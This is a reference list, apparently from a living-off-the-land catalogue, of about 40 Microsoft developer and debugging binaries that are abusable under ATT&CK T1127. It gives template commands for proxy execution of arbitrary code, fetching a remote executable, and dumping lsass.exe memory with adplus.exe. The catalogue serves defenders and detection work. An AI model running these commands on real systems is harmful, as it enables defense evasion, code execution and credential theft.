T1127: Technique T1127
Adversaries may leverage living-off-the-land techniques (T1127) to achieve execution, evade defenses, or transfer tools.
Living-off-the-Land Matrix for T1127
Across 40 verified binariesApplaunch.exe
Microsoft .NET ClickOnce Launch Utility.
Aspnet_Compiler.exe
ASP.NET Compilation Tool
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v none -p C:\users\cpl.internal\desktop\asptest\ -f C:\users\cpl.internal\desktop\asptest\none -uCsc.exe
Binary file used by .NET Framework to compile C# code
csc.exe -out:{PATH:.exe} {PATH:.cs}Ilasm.exe
used for compile c# code into dll or exe.
ilasm.exe {PATH_ABSOLUTE:.txt} /exeJsc.exe
Binary file used by .NET to compile JavaScript code to .exe or .dll format
jsc.exe {PATH:.js}Microsoft.Workflow.Compiler.exe
A utility included with .NET that is capable of compiling and executing C# or VB.net code.
Microsoft.Workflow.Compiler.exe {PATH} {PATH:.log}Ttdinject.exe
Used by Windows 1809 and newer to Debug Time Travel (Underlying call of tttracer.exe)
TTDInject.exe /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /Launch "{PATH:.exe}"Tttracer.exe
Used by Windows 1809 and newer to Debug Time Travel
tttracer.exe {PATH_ABSOLUTE:.exe}vbc.exe
Binary file used for compile vbs code
vbc.exe /target:exe {PATH_ABSOLUTE:.vb}adplus.exe
Debugging tool included with Windows Debugging Tools
adplus.exe -hang -pn lsass.exe -o {PATH_ABSOLUTE:folder} -quietAppCert.exe
Windows App Certification Kit command-line tool.
appcert.exe test -apptype desktop -setuppath {PATH_ABSOLUTE:.exe} -reportoutputpath {PATH_ABSOLUTE:.xml}AppLauncher.exe
User Experience Virtualization tool that launches applications under monitoring to capture and synchronize user settings.
AppLauncher.exe {PATH_ABSOLUTE:.exe}Cdb.exe
Debugging tool included with Windows Debugging Tools.
cdb.exe -cf {PATH:.wds} -o notepad.execsi.exe
Command line interface included with Visual Studio.
csi.exe {PATH:.cs}DbgSrv.exe
A process server included with Debugging Tools for Windows for remote user-mode debugging.
dbgsrv.exe -t tcp:port=5005 -c {CMD}Devtoolslauncher.exe
Binary will execute specified binary. Part of VS/VScode installation.
devtoolslauncher.exe LaunchForDeploy {PATH_ABSOLUTE:.exe} "{CMD:args}" testdnx.exe
.NET Execution environment file included with .NET.
dnx.exe {PATH_ABSOLUTE:folder}dotnet-counters.exe
.NET diagnostic tool for monitoring performance counters of .NET applications in real-time. Installed via 'dotnet tool install --global dotnet-counters' (.NET SDK required).
dotnet-counters.exe collect --duration 1 -- {PATH:.exe}dotnet-trace.exe
.NET diagnostic tool for collecting runtime traces from .NET applications. Installed via 'dotnet tool install --global dotnet-trace' (.NET SDK required).
dotnet-trace.exe collect --duration 00:00:01 -- {PATH:.exe}Dxcap.exe
DirectX diagnostics/debugger included with Visual Studio.
Dxcap.exe -c {PATH_ABSOLUTE:.exe}IntelliTrace.exe
Visual Studio command-line tool for collecting and managing diagnostic trace files.
IntelliTrace.exe launch /cp:"collectionplan.xml" /f:"c:\users\public\log" "C:\Windows\System32\calc.exe"Mftrace.exe
Trace log generation tool for Media Foundation Tools.
Mftrace.exe {PATH:.exe}Microsoft.NodejsTools.PressAnyKey.exe
Part of the NodeJS Visual Studio tools.
Microsoft.NodejsTools.PressAnyKey.exe normal 1 {PATH:.exe}Mpiexec.exe
Command-line tool for running Message Passing Interface (MPI) applications.
mpiexec.exe {CMD}Ntsd.exe
Symbolic Debugger for Windows.
ntsd.exe -g {CMD}Pixtool.exe
Command line utility for taking and analyzing PIX GPU captures.
pixtool.exe launch {PATH_ABSOLUTE:.exe}rcsi.exe
Non-Interactive command line inerface included with Visual Studio.
rcsi.exe {PATH:.csx}Remote.exe
Debugging tool included with Windows Debugging Tools
Remote.exe /s {PATH:.exe} anythingherete.exe
Testing tool included with Microsoft Test Authoring and Execution Framework (TAEF).
te.exe {PATH:.wsc}Tracker.exe
Tool included with Microsoft .Net Framework.
Tracker.exe /d {PATH:.dll} /c C:\Windows\write.exeVSDiagnostics.exe
Command-line tool used for performing diagnostics.
VSDiagnostics.exe start 1 /launch:{PATH:.exe}vsjitdebugger.exe
Just-In-Time (JIT) debugger included with Visual Studio
Vsjitdebugger.exe {PATH:.exe}VSLaunchBrowser.exe
Microsoft Visual Studio browser launcher tool for web applications debugging
VSLaunchBrowser.exe .exe {REMOTEURL:.exe}vstest.console.exe
VSTest.Console.exe is the command-line tool to run tests
vstest.console.exe {PATH:.dll}Wfc.exe
The Workflow Command-line Compiler tool is included with the Windows Software Development Kit (SDK).
wfc.exe {PATH_ABSOLUTE:.xoml}WFMFormat.exe
Command-line tool used for pretty-print a dump file generated by Message Farm Analyzer tool.
WFMFormat.exeWinDbg.exe
Windows Debugger for advanced user-mode and kernel-mode debugging.
windbg.exe -g {CMD}